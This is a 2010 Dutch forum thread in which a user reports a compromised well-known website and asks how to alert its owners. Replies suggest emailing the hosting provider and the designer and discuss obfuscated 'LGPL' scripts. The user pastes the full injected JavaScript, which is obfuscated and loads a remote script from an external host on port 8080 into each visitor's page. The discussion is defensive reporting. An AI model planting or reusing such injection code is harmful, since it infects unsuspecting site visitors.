Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien

wat doe ik als een bekende site gehackt is

Pagina: 1
Acties:

  • bastian433
  • Registratie: Juli 2004
  • Laatst online: 30-11 14:33
een grote vrij bekende site ook te vinden in de pricewatch hier bv. heeft javascriptcode onderaan staan die er niet thuis hoort.
het begint met
/*LGPL*/ try{ window.onload = function(){var Bx1k8ta0qobj4 = document.createElement('s$#c(^r((!&!i$p@(t@&$('.replace(/\(|\

Wat is de beste manier om verder actie te nemen
Ik heb de zowel de hosting provider als het desbetreffende bedrijf nu net gemailt.

Ik denk niet dat het handig is hier een naam te gaan noemen van het bedrijf ivm mogelijke imagoschade ?

  • Wish
  • Registratie: Juni 2006
  • Nu online

Wish

ingwell

Geen idee of dat script wat doet, maar meestal heeft zo'n site ook nog een "designed by".... die zou je dan ook nog kunnen mailen.

No drama


  • NiteSpeed
  • Registratie: Juli 2003
  • Laatst online: 20-09 23:58
Het lijkt me sterk dat hackers/crackers hun code beginnen met een Lesser General Public License statement. Maar los daarvan, meer dan een whois op het domein en technisch beheer een mailtje sturen kan je niet doen.

  • Thandor
  • Registratie: Juni 2002
  • Laatst online: 07:27

Thandor

SilverStreak

bastian433 schreef op vrijdag 08 januari 2010 @ 23:02:
Ik denk niet dat het handig is hier een naam te gaan noemen van het bedrijf ivm mogelijke imagoschade
Niet alleen imagoschade maar je voorkomt ook dat je het publiekelijk kenbaar maakt en mensen er misbruik van kunnen maken.

Profiel | https://thandor.net - hardware
And the rest of us would be carousing the aisles, stuffing baloney.


  • Boudewijn
  • Registratie: Februari 2004
  • Niet online

Boudewijn

omdat het kan

Vraag is of de site gekraakt is, of dat er gewoon een programmeer\configuratie foutje is gemaakt.

  • job
  • Registratie: Februari 2002
  • Laatst online: 21-11 13:13

job

NiteSpeed schreef op vrijdag 08 januari 2010 @ 23:10:
Het lijkt me sterk dat hackers/crackers hun code beginnen met een Lesser General Public License statement. Maar los daarvan, meer dan een whois op het domein en technisch beheer een mailtje sturen kan je niet doen.
http://www.symantec.com/c...uscated-scripts-wild-lgpl

  • Rollo
  • Registratie: Januari 2009
  • Laatst online: 28-11 07:38
is meer een scriptje in de trant van speciale tekens vervangen geloof ik

  • bastian433
  • Registratie: Juli 2004
  • Laatst online: 30-11 14:33
Ik vind het echt alarmerend het staat boven de header en onderaan en in de javascript bestanden en maar 4 virusscanners struikelen erover

als ik het stuk script in een text naar virustotal verstuur krijg ik dit:

http://www.virustotal.com...22e8d1ccfc5054-1262986402

ja het kunnen false positives zijn maar ik geloof er echt geen fluit van

Misschien kan iemand het decoderen

het gaat om bijvoorbeeld:

/*LGPL*/ try{ window.onload = function(){var Bx1k8ta0qobj4 = document.createElement('s$#c(^r((!&!i$p@(t@&$('.replace(/\(|\)|&|\!|@|\$|#|\^/ig, ''));Bx1k8ta0qobj4.setAttribute('defer', 'd(!(&e(f!&@e^^r('.replace(/&|#|@|\!|\(|\)|\$|\^/ig, ''));Bx1k8ta0qobj4.setAttribute('type', 't#^e$@&x(@t@)/@#j@#a#v))a^^(s!##c$^(@@r^i$(#&p)$t^'.replace(/#|\!|\)|@|\(|\^|&|\$/ig, ''));Bx1k8ta0qobj4.setAttribute('id', 'F#k(#x(&u#)k@!^#l&@4!1@##t@(4@$i))e^^g&t$(@@y^))'.replace(/@|#|\$|\(|\!|\)|&|\^/ig, ''));Bx1k8ta0qobj4.setAttribute('s^r!!$c!'.replace(/\!|&|\(|\$|#|\^|@|\)/ig, ''), 'h(@(&t$#!t&)p):^$)/)^&/$&#i!$!^z^)a)#)#^-)@!)n(&)$e!)-&j(p@@.^!e&!)x^p&)!e)!)r(t$($s!!-^e@#x@c&)h!#$a)n@$#g$e$#)!.@$c&#^^o@#m$!(.&w@#^w&^#w!-&&^n@$e&^$t!^$-!#!!c(n!.^#t)(e@&e^#n^w@)(!e@b&)#d(((@e$s^!!i#(^g)n(!&!.)^^(r!$(&u^:(^8$!0^#8^@#0$!)/$#&!t(!!$m!^)z!).$c(o^m(!^/$@^t&(m$$z&@.#&c^o##m((/!@d^#a&#)&n((&g@&#d)&a)^)n(^g^!@^.@#@&&c)^o^^m)$/!@)!e&c^^^h$$o$r)@o)!(&u!$k(^o(n)#^(l^#i)(n&!e@.&(c@o&m#!!/(g&&&!#o)$$o$g#$!#l@)&e@&).!&c&(&&o(^$m!^/^)$'.replace(/\!|\^|\$|\)|@|\(|&|#/ig, ''));if (document){document.body.appendChild(Bx1k8ta0qobj4);}} } catch(Vaixu0732pxbgho5yxma6) {}

  • bastian433
  • Registratie: Juli 2004
  • Laatst online: 30-11 14:33
Blijkbaar heeft er iemand wel mail gelezen want de code is ineens verdwenen
Pagina: 1